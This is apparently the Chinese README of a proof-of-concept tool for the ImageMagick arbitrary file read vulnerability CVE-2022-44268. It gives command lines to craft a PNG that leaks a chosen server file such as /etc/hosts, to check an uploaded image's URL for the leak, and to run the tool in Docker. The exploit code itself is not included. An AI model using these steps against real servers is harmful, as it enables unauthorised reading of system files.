本文详细介绍了ImageMagick CVE-2022-44268漏洞的利用方法,包括如何通过恶意PNG图像读取目标系统的敏感文件,以及使用Python脚本和Docker容器进行漏洞验证的具体步骤。
CVE-2022-44268 🧙♂️
CVE-2022-44268 ImageMagick 任意文件读取漏洞
用法 🛠
对图像进行投毒 ☣️
1
|
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
|
检查漏洞利用是否成功 🗡
1
|
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png
|
通过Docker运行 :whale:
构建
1
|
docker build -t cve-2022-44268 .
|
运行
1
|
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png
|
参数 🧰
| 参数 |
描述 |
类型 |
| –url |
已上传PNG图像的URL |
字符串 |
| –image |
输入的PNG文件 |
文件 |
| –output |
输出的PNG文件 |
文件 |
| –file-to-read |
从漏洞主机读取的文件 |
字符串 |